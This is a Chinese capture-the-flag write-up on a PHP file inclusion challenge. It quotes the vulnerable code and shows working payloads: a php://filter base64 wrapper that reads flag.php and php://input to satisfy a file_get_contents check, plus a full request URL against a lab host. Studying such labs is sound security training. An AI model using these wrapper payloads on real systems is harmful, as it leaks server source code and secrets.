fileinclude

访问靶场（开门见山源码）

源码分析

include("flag.php");//此文件包含flag.php文件也就是可以访问到其中的flag
highlight_file(__FILE__);//代码高亮显示

if(isset($_GET["file1"]) && isset($_GET["file2"]))//get方法同时传入两参数才可以进入此if语句。
{
    $file1 = $_GET["file1"];//将传入的值分别赋值给变量file1与file2
    $file2 = $_GET["file2"];
    if(!empty($file1) && !empty($file2))//连个变量不为空进入此if语句
    {
        if(file_get_contents($file2) === "hello ctf")//如果file2的值全等于hello ctf则进入此if语句。
        {
            include($file1);//包含file1
        }
    }
    else
        die("NONONO");
}

分析思路

1:flag在flag.php中,那我们就要想办法包含它，顺理成章的就是进入最后一个if语句。
2：进入第一个if语句很简单只要get传入俩指定参数名即可

?file1=&file2=

3：进入第二个if只要不同时为空即可

!empty($file1) && !empty($file2)
//只要不同时为空即可
?file1=1&file2=1

4：绕过第三个if

file_get_contents($file2) === "hello ctf"//这里是===就是要完全一样等于hello ctf

5：include（$file1）这里我们要想办法让file1的值为flag.php
并且发现代码里并没有输出的函数，也就是我们光包含了flag.php是没有用的。还要能够读取它。
这里我利用的是php伪协议，下面是一些简单的用法举例

file1=php://filter/read=convert.base64-encode/resource=flag.php

这句话的意思就是读取flag.php文件的内容并进行base64的加密。

最终尝试

61.147.171.105:60735http://61.147.171.105:50471/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=hello ctf

弹出个这个东西，老实讲我也没有中文字符，直接就给我跳到必应上去了。
&
&
&
那没办法了file2也用伪协议吧！
这句话的意思差不多就是转换了一下方式，原本是get传参，用了这条伪协议就可以使用post传参，我用post传参的方式上传file2的值。

file2=php://input

这里成功返回了加密以后的flag.php的内容。

解密

关于伪协议，我也只懂皮毛，各位看官如果想了解，这边建议去康康大佬的解释。